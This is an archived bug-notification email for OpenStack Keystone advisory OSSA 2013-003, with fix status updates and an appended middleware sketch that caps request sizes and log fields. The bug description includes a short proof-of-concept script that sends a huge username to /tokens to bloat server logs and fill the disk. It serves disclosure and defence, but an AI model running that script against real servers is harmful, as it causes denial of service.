yahoo-eng-team team mailing list archive
Message #02490
[Bug 1098307] Re: [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs
** Summary changed:
- unauthenticated POST to /tokens can fill up disk/logs
+ [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs
** Also affects: ossa
   Importance: Undecided
       Status: New

** Changed in: ossa
       Status: New => Fix Released

** Changed in: ossa
     Assignee: (unassigned) => Thierry Carrez (ttx)
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1098307
Title:
  [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Committed
Status in Keystone folsom series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
A remote unauthenticated keystone user could potentially fill up the
disk on a Keystone server by running the following python script:
-----------------------
from keystoneclient.v2_0 import client

PASSWORD = 'foobar'
TENANT = 'blah'
USER = '00000' * 9999999
keystone = client.Client(username=USER,
                         password=PASSWORD,
                         tenant_name=TENANT,
                         auth_url='http://localhost:5000/v2.0')
-----------
Running this script will increase the log file size by 100 MB per
request. NOTE: This happens when running keystone at the default log
levels:
# verbose = False
# debug = False
Version-Release number of selected component (if applicable):
openstack-keystone-2012.2.1-1.el6ost.noarch (Red Hat)
How reproducible:
*always*
To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1098307/+subscriptions
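
A defensive counterpart to the report above, added here as an example; it is not taken from the bug report and is not Keystone's own fix. It sketches a WSGI middleware that rejects oversized request bodies before the application parses or logs them, plus a helper that bounds client-supplied fields in log lines. The names BodySizeLimit, truncate_for_log and the 64 KiB cap are assumptions.

```python
# Added example: names here are hypothetical, not Keystone code.
MAX_BODY_BYTES = 64 * 1024  # assumed cap; size it to the largest legitimate auth request


class _Capped:
    """File-like wrapper that refuses to read more than `limit` bytes in total."""

    def __init__(self, stream, limit):
        self.stream, self.left = stream, limit

    def read(self, size=-1):
        want = self.left + 1 if size is None or size < 0 else min(size, self.left + 1)
        data = self.stream.read(want)
        self.left -= len(data)
        if self.left < 0:
            raise OverflowError("request body exceeds limit")
        return data


class BodySizeLimit:
    """WSGI middleware: answer 413 before the app parses or logs the body."""

    def __init__(self, app, limit=MAX_BODY_BYTES):
        self.app, self.limit = app, limit

    def __call__(self, environ, start_response):
        try:
            declared = int(environ.get("CONTENT_LENGTH") or 0)
        except ValueError:
            declared = self.limit + 1  # malformed header: treat as oversized
        if declared > self.limit:
            return self._reject(start_response)
        # Chunked or mis-declared bodies are caught when the app actually reads.
        environ["wsgi.input"] = _Capped(environ["wsgi.input"], self.limit)
        try:
            return self.app(environ, start_response)
        except OverflowError:
            return self._reject(start_response)

    @staticmethod
    def _reject(start_response):
        start_response("413 Request Entity Too Large", [("Content-Length", "0")])
        return [b""]


def truncate_for_log(value, limit=256):
    """Bound any client-supplied field before it reaches a log line."""
    text = str(value)
    return text if len(text) <= limit else text[:limit] + "...[%d chars dropped]" % (len(text) - limit)
```

The body cap stops the request at the edge; truncating logged fields keeps a single request from growing the log by more than a fixed amount even if another code path accepts large input.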